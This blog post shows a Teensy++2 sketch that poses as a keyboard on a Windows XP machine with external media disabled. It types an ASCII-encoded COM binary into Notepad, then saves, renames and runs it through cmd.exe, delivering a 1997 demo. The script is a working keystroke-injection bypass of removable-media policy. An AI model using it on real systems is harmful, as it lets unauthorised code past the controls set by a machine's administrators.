16bit COM hacking & Teensy vs. Windows

I was messing with the Teensy++2 again and came with some cool demo for Windows XP SP3. In this exercise I have the following restricted environment:

 – System is not connected to the internet                                                                                                – Mass storage is disabled by whatever policy there is                                                                            –  No Floppies, CDROM, no external media                                                                                              – The PC of course has one USB port available (which we can access)

Our task is to put a binary program on this computer and run it. There are no compilers, just default WinXP SP3 installation. My program will be an old school 16bit binary demo from an old scene group Sanction (Have you ever seen a complete Descent Engine with music in 4K ?) Once I came across a really cool thing, on some ancient message-board somebody had an ASCII text file which looked something like this :

T_OOWW3=XXWXPY50PPZ5jQP_-ys,A1Ea5y852cP4Z4PP-pV40P-BOu
yomwtgh/Nide5UqPWX,wP500-MQP4UP-wx4XP5rjP5Z2P-jC,JP=
5O4,APRX5BZP-pJPPQX42P-r=PRX55aP59DHHP-99,UP-lt,mP-uq=
P5_VHP-4A40PTZ,TPP_RX__L5Z54BBuDONecL.E44IPZALArpx_ojD

There were instructions to save this file as text file and rename it to uudecode.com. Surprisingly it ran the program. Now this was a big WTF for me. So I went digging into this a little further and found the ancient source code to encode 16bit DOS com binaries to text.  It does exactly what it is supposed to do. Transfers binary gibberish into nicely formatted text which is executable.

Perfect tool to use with our exercise ! So next step was basically easy, transfer the ancient demo binary to text file and program Teensy++2 with it.

#include <phukdlib.h>
void setup() {
}

void loop () {
  delay(5000);
  CommandAtRunBarMSWIN("notepad run.com");
  delay(400);
  PressAndRelease(KEY_ENTER,1);
  delay(400); 
  Keyboard.print("T_OOWW3=XXWXPY50PPZ5jQP_-ys,A1Ea5y852cP4Z4PP-pV40P-BOu");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("r2d2lol/Nide5UqPWX,wP500-MQP4UP-wx4XP5rjP5Z2P-jC,JP=");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("5O4,APRX5BZP-pJPPQX42P-r=PRX55aP59DHHP-99,UP-lt,mP-uq=");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("P5_VHP-4A40PTZ,TPP_RX__L5Z54BBuDONecL.E44IPZALArpx_ojD");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("Aop4AAe0xDPF9HQNIAtmKRGgykX3.b8b7555hH44744EtFg8CjnosK");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("_84TN.O4EkwvHoXIhhAjdiu60o0ru09HQNKpTCwI5_ub5nzDPEOSth");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("yAW5yThoE7rWwMroHe_1e4o2weRoh5.96DGdFq.36D41FtASQt1Ge0");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("0qZnADA5p1KRt.9tGWwW8NC7xNfWUfBs3HHPdXIUzgErjh3SuJtdc6");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("k3izhG2XC65yeIxNsXIKw1xgnLJ0hc3W1eEZ.qLtzJmWXcSBdyZ3Bz");  
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("fgpRQ4AYSF3nu5ebeSoidSJ906FWVs70Nzpmvoea7PTq4KBuOn9YgV");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("7g9e1Zf9b7KGR2ISUjXkcSe3Qaoc8Fg4AgYnNcQ2eJPGGLuQkaKuFk");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("qOypuI3xsxyr2xnKHTIToSQ7_PHjv5_wpx4hV7x3aZw8gjXIuGA1Q2");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("_gPNpJvEACUKIGUNiny.nZiB_.__ryTBGZJuwdo7N37mgFIgdx6Cpx");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("AyVvqnZVmbWFo4Ut35_UQ_0QixXNjB5iKigI1dznHYeWmIG.qJVcEb");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("0ZCabDQYLABEdG5T3eC44ItaDx69dzBo6_rC4L09BKivUV4kWBwBv4");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print(".kAvYCUlzQAx955aognT0oCyl9NjBdQ_LV3GukNg9W4THerLBxwvdP");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("fxGZovrge6j3fhSQneJd53Tb8StDyNagYKm2HjhZiq5FDTC_xulHih");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("gCx9yN.G3isgLzbvkOPezkNYKz_rWKYYZ69iNcG64HlKLtpAnQE4LQ");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("YydzrKnU9AieObfiDgUvJkGQ4EIHNIInM15hxgf5iRvpr03QXUrdZi");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("SsYae6uMfqShOLJeDTMkPb7_JVjxHXwuz0g0dxwMdPmjSdkTWSOsCA");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("Ic_ZKgxrEM8EQ2cMI_wwNMEX6YhAV1Z9D__7Uo23XuZyEhBXDga.Z9");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("npANaB4V8pKDefIdCYbezFNMZ9DSWFlMnE6JaXT.oLqTuci5x6pcHK");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("IaC7g8fV2y9OziMRz0C9z7UdyhY4DpWDf84wrlz6bnv_lLttruW3EM");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("S1KsA50t98n6goQbAJ9HxTKrWL5jFEwD1pTAQvtA3lHz9Pnn1eMfGq");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("f0LfOYNaoTVUSFhjJJiQXydrW9GLtD5M9eqBjgnL8Y84Q79ALFoW.2");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("9aB.dmwxm.b_O8hFnWoX.jOoJ.SKThRpsJ6DeKd7wjZOevUeh2zsRQ");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("C49ySb4ZCsnxSMND5p97dlpc494sy9QzVItn5QwfSz0lQu7cgNY9at");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("gGzZKeFildCj3gPh.kFP6NPSqVKR8eIONoTn9nQWUbp0dutwsD_sYG");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("STOnd_ukbGNIpRsI07yYT61_BFfbvFVUb6eI.CYJl9hkb6yRrgcrwB");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("R6DQiULacSr.01gM1n5DmGDWMHOc.Ea.0YKVWekOM.nKxrqpP9AYe1");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("tuQYdaL70obddJmw2F1hNbrGHRfhbMZTN8xCgASbh0RYk3SbM8SGRE");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("HrS8TtRjr9KpmOM4PHe_vgqg1rpV20t.PhhQWelAetIJ1UVQCIKi.Y");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("gHOIKf3vfoqmFfzOtvF0o2c5eFQNlfnqIQY3IJcAZb3DJcAbwIkx4n");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("mEOEGjIAcqmHfdwPEFla5CiiLMsUrdSjq5Ii7jKHyqZREe27_0FZh2");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("wVsQWEge3z1P2qqP4ej2KxG0FfLynZR6buVV6vwzG2et7frazjub9h");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("q6RgGgTgxAUNlKscyKKolaIOz.Z_e9Hr82R86UmhrnEeRVzXCY98Fp");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("MW9GyzRunvBOqC7rqxCTx0yKNOqLy2RCIPvx48BrexE8g64lGUVbQ3");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("z.VARHAkg31OIpLnIPNSrgjZlMfo.9PlzHBBM0tbpQ0H1WPq7s4ZJM");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("zzce3YdZSpB1.jBsPIlbpQ6yro8rs_sTkKMzauhlAV5hEyOXlylKmw");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("USdVfdlbvmrQFV4yDwmCFZ_1DkupIp0z_e2zMlubDKTdXlfl8JXfMI");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("dmbxHDih4t8igRfDsmFipfD6w1731iWJvmima6KCi3Qyw8KuRpWXMu");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("fjGUM_TEuAGLrSbTUh56LND6bDGp2nE2iVtYrHBsNN7nCfuCtEIVwd");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("E8mPmSY2eNEMjJCo7o4nHYsZUY9JTGkCXmBPWtxTw6oSHe_zhAWb3P");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("zisHi5wy7h97DAPaGxAkty5Gky1GDAhHdY3yWqEOVRCH2ZH_uxQ5dF");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("zviK.YIu3aqmJW.z.DJhFbFiU4oJUyIP0PA2XnYTL6vK.NDvqkdOgT");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("QVQmhWWbtT2NZzT9bSMU8Coun5eOrNvIQavUM7Ou9WwpczUtrEjv8V");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("myLTvjrqqsyknCM40Y_iPEeBYA0Bg_EmyNZySrBRv2oUtsq4EgmTuO");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("jFpQqDKqD.ByjE9YDsYK1FC46lhq4NyQu3fNq4hEaSedWcQJDSfcSJ");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("81VeGYTEgolv4AY0CunTOVEYSXzKQBA681pYV2eSUW2LSrNF6FdLBo");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("zVCQ94ZYhRytOQQPHMWq0HqaugXzKF1BzJQiXAmoIEe64ChQ4us4ok");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("iv_Nywok3ogagdtI3i7iSVHbdeaGoI2cixof6ENMklS5B2fZVHqjt8");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("ObQjrSaWGupkN1dqs.rBZFS52XW_9_dDWbE2xGLUhYQ.MJOYV7JnXw");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("Jh5zzjZ9O91xTI2wkDVumgtTN5vCi8VK69.JMHnTceuxE23SI_R5_U");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("3gs3mBDG8VijU8AAx1l98B.WTpX_8Z0CxMbXEYjCymt8Hmjad6uO8E");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("XI5WmlBaDxnxBRatEePFjpW51HFMd6uvNiTMfXGkbTWVQ6Y8T9JWeC");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("YmQbJIYBG8P9I8H_JMUUjNO_m7bmbCsKdoSGNts8t4NTM1fUZ60S.H");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("ZwERJDkbrZqm8hLJOW8qmgTBJJT5gCwtYh7teU.G.CQzcps0q7C66b");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("YGd0hxH02szn3qaMC4__uSsG25riXDsAMKTlvyeY6miQPZGyHxooL4");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("QcGoeC3QVJus4lBZjuXfvmSGD_4s_4i3hMl3S4_7wKwwuluTdXEiyE");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("p25IEBPgW6w3J1mQpbjQ4TY1B.H2tkXP3Ob.SXj0uOwpataKo.YkSb");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("WvC7GRzFAkf6shawyzNazUV8jJElIYMTf73th4f.rLnwNmFtBqEq1Q");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("JvXAr9a7_zlJl8vXLrz.WPHSvc_j_bJ6BedujJK3b9dXKFBCrBggIy");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("TGHoUBzDwsn.5kdGQujfHkKdxUsLObCM.afTR8TRDBb0xknaW_LAoC");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("LeJVhD_hQ2tCc6ys8MVvn9TF4qIZfJhgG7xHrzZ5tWd8OM2TAd8xqy");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("cgePiEe.17bKRupHPODxF9A_05Kx7Az63cJtYwNecrQbOyanD1uX.h");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("KCSClvsHDquEZH6otuBa5xk6tqg3dZwbQ9klH7BGzyiPXTSV89vh8S");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("Zvxt_HmhDuJEwmXiykA0KB9sp1krdXqQ0Yg6VAKtn_SAJ6RGEzuEGI");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("ZqMGy38mdzAIcEu6aejW2QCsoTFqIc8oRGuC0UFcRppmkV3BdWf0MX");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("AQRE8Tdm1cbG71oDXHGyM0X8cG4uk.8s.UlMyOLvr802Yoyv2L5aiN");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("3CFdWio8ycCobcUE9XVI5iXG7Xkw2HTNWNk3gYSt.kthf87FJGNNjU");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print(".easLwEcliUZWgTXhRUhtRNgua9PUt56mFGpphkpxV8dm4kg.4rrKK");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("kpYt1_01JPHYeM8DW._t1j_nJmHJ_wF_v484FHSv.S7cefyt387Vb7");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("qcsR3NmdJzWiggbBxL46jqUYMFFhqSGQqQuGVS9iVncErXUp5aKS__");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("4C2QkLbL5XzjcTYbveBoPH4bWh835X0o6P_di3YFLFj0qW8YJzgD1z");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("nrf0KovaFd85tOV7ZbG9iaF6tBuQNSSeK1EwQE1rXdx8bWdvQgRBEs");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("vyU6uhkBi7dJCjxdsxdINj9bLvV0FwL21EgRFSK7e1t2lgXpN3pn._");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("_iIpqTF26k.SV4dixEjjNAv2JC7GtdtKxhpDA6TIQ9iNcA2WP63jYm");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("Tyv8ObXZme0_dbTH6_NPzcVI7Sof081T9r4Rr_06NROHcS4EMvGf61");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("qlQ54V___5bKqzqslBdgBJpbro_Sbep0nzvPRWgDYMJj.pJryUz3QY");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("nlNnYVc8RvkooOIXtfYNLkaC8ZG818SLZxBELsl4IUjUxEIPwSYzq5");  
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("pUs87iziu0nviEnK8IwGC21gA4YL3tpAGdbyxQmjbgKz9KubvXN.P6");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("qs4z7rNaQwlGfsfFkTzJ7Omml_GSUiaDIaz1AQdFSnbgo09CmjguUP");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("uM5C3J2pzFd9SRXdSfpXNE347GKonCzfSqCxzGwd7b0HCHP_.ePVCc");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("eivQRAmI_OQ9Q3pgz0Rzf77JAA26uT8we2xxyMvghlG2fQ_oCY3g19");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("Oa7iioMAPQKnakd78xoHb_6E6oolLPAmgmuGpQphtVL1cJk1SyTOOR");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("PP0iKBI6p9CWhBZDAVYYWm9mZrJA3zT.sok.6ukilBjvHvEyS46wPq");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("3w0Ve_19lybCagzK6l3SBkv2S__QMLHjT1PLj0Vw4kQAYn.YyNfYEP");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("J7ewiyMkPFBJLg1pFzYkXCx1W.3xsGtQL7yi6WE7KB4olRHdNdcZdL");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("rrBLuieA9.4sDgmJwjol5hOsBo9fC7XwUy2pWF3w7SPnk6ii_xrHf6");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("2ncc2985ff94NKx_9xirQxVbyCgCr_d56rt__HnRkk1rQcLWgbSwa1");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("7xVA_BMRS7mnOBDzMj0QHAN7DZuDvTqeBKDMWxwam9SaDOSNXSymm0");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("cxLt0o_VnwM4.oEa37egQg8Cc1IUKDzAfdkEby0JcdVqZlhqnUChEC");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("6aasZcocZFxJSOstcQvPNyVp9i0LirWTCF4BPVtvYHdAWA3uW.KmGZ");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("9CPhb_r3IKSbdYiJNM98kVfVGXvarK2iNRoTJCeOVCC78YpW3NS1Tu");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("jCurzFPHfliRyqtEv.wfHqkNvfb56cn2SiUnHxQp90Lqpko1.hFYbI");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("K1gk6x32bopXJPQs8OV_JuY7UuYUhr6N81OGIbHrZmgcv_i3p2DeVt");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("ap.h8b2wZZdAIW8mHNRwuonyoIrwgA18BMTjw9huW_igJknQhJ4NP1");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("0ekjGxTx4cbQxrHuYz.3JX5BJrWbLgvciNlLigS.oOgTFqnyF_.PQz");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("EN9BP4WlcKMyAmEcDt4P6i22cz51.Vzv3Ai46Mp5nwoMy2KbGcO8kF");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("1nM_6WBRHyR8sh2LzxxnJgW3_WpfYA5puXI4lv_lRyPhNORb3q3M4q");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("3f3DAPjPhb3OiDciJ9EZh5cKNCXORr2LY53qWMqqFfyGP4YaJLqcF9");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("IPkXx8PBJcFrriEcB1654qhROoWYMvlJc4QUIyx97lA6tVV03M3f57");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("iTs.xw8uB47QNM.CUNYG4A3Ts4CdNneeDP.mUGVKJfn0UuCm1JzXzJ");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("loKipspBNI8MLHCr1ZPLhLGmMseu2sbUrcF67ZXJDJ.aDJ4RrEY1Ut");
  PressAndRelease(KEY_ENTER,1);
  Keyboard.print("yc.H9lLcPmhPM.wxMluyEbE6iW04H:");
  PressAndRelease(KEY_ENTER,1);
  delay(800);
  Keyboard.set_modifier(MODIFIERKEY_CTRL);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_S);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(800);
  Keyboard.set_modifier(MODIFIERKEY_ALT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_F4);
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now(); 
  delay(800);
  Keyboard.set_modifier(MODIFIERKEY_GUI);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_R); 
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(300);
  Keyboard.print("cmd.exe /C move");
  Keyboard.set_key1(KEY_SPACE);
  Keyboard.send_now(); 
  Keyboard.set_modifier(MODIFIERKEY_SHIFT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_QUOTE); 
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  Keyboard.print("%HOMEPATH%");
  Keyboard.set_modifier(MODIFIERKEY_SHIFT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_QUOTE); 
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_BACKSLASH);
  Keyboard.send_now();
  Keyboard.print("run.com");
  Keyboard.set_key1(KEY_SPACE);
  Keyboard.send_now(); 
  Keyboard.set_modifier(MODIFIERKEY_SHIFT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_QUOTE); 
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  Keyboard.print("%HOMEPATH%");
  Keyboard.set_modifier(MODIFIERKEY_SHIFT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_QUOTE); 
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_BACKSLASH);
  Keyboard.send_now();
  Keyboard.print("a.com");
  PressAndRelease(KEY_ENTER,1);
  delay(500);
  Keyboard.set_modifier(MODIFIERKEY_GUI);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_R); 
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(300);
  Keyboard.print("cmd.exe /C");
  Keyboard.set_key1(KEY_SPACE);
  Keyboard.send_now(); 
  Keyboard.set_modifier(MODIFIERKEY_SHIFT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_QUOTE); 
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  Keyboard.print("%HOMEPATH%");
  Keyboard.set_key1(KEY_BACKSLASH);
  Keyboard.send_now();
  Keyboard.print("a.com");
  Keyboard.set_modifier(MODIFIERKEY_SHIFT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_QUOTE); 
  Keyboard.send_now();
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  PressAndRelease(KEY_ENTER,1);
  delay(900000);
}

What happens here is this: Teensy opens up notepad and inserts the above text into it. After it finishes writing on screen, it saves the Notepad text as run.com in the home directory and renames itself into a.com and executes it. This wont work in Win7 as the demo sets itself to full-screen and NTVDM in Win7 forbids it. It works nicely on Win2k, XP SP3.

Enjoy the demo which won the 1997 4k intro competiton @ Mekka & Symposium in Fallingbostel, Germany

To err is human, to forgive, beyond the scope of the Operating System.

Advertisements
Gallery | This entry was posted in Uncategorized. Bookmark the permalink.

2 Responses to 16bit COM hacking & Teensy vs. Windows

  1. ihackedmypc says:

    What app do you use to turn the commands into binary? I see from the post that doing the rename turns binary -> test but how do you do it the other way around?

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s